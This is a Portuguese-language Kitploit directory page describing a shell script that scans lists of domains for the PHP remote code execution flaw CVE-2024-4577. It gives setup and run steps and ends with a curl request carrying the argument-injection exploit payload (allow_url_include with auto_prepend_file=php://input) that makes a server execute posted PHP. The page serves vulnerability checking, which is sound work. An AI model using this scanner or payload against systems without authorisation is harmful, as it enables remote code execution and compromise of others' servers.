Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4577 — Script shell para escanear domínios pela vulnerabilidade de execução remota de código CVE-2024-4577 no PHP através de requisições POST manipuladas, exportando alvos vulneráveis para verificação manual. | Kitploit
Ferramentas/GitHubGitHub/graphite-org/cve-2024-4577
ReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

Script shell para escanear domínios pela vulnerabilidade de execução remota de código CVE-2024-4577 no PHP através de requisições POST manipuladas, exportando alvos vulneráveis para verificação manual.

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Verificador de Vulnerabilidade CVE-2024-4577

Este script foi projetado para verificar a vulnerabilidade descrita pelo CVE-2024-4577, que envolve a exploração de certas configurações PHP para executar código arbitrário remotamente. Ele envia uma requisição POST para endpoints especificados em uma lista de domínios e verifica se a resposta indica vulnerabilidade.

Uso

  1. Instalar o GNU Parallel:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. Clonar o Repositório: Clone este repositório para sua máquina local usando Git:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. Navegar até o Repositório: Entre no diretório clonado:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. Preparar a Lista de Domínios: Crie um arquivo de texto contendo uma lista de domínios a serem verificados. Cada domínio deve estar em uma nova linha. Por exemplo:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. Executar o Script: Execute o script CVE-2024-4577.sh, passando o caminho para o arquivo de lista de domínios como argumento:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. Revisar a Saída: O script exibirá informações de progresso enquanto verifica cada domínio. Se um domínio for considerado vulnerável, ele será destacado em vermelho. O script também exportará uma lista de domínios vulneráveis para um arquivo chamado vulnerable_domains.txt.

Arquivo Exportado: vulnerable_domains.txt

O script exporta uma lista de domínios vulneráveis para um arquivo chamado vulnerable_domains.txt. Este arquivo contém uma lista simples de domínios vulneráveis, com cada domínio em uma nova linha. Para confirmar manualmente, use o comando curl para enviar uma requisição POST ao endpoint alvo no domínio. Substitua https://dev.example.com/test.php pelo endpoint real no domínio alvo.

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
Baixar ferramenta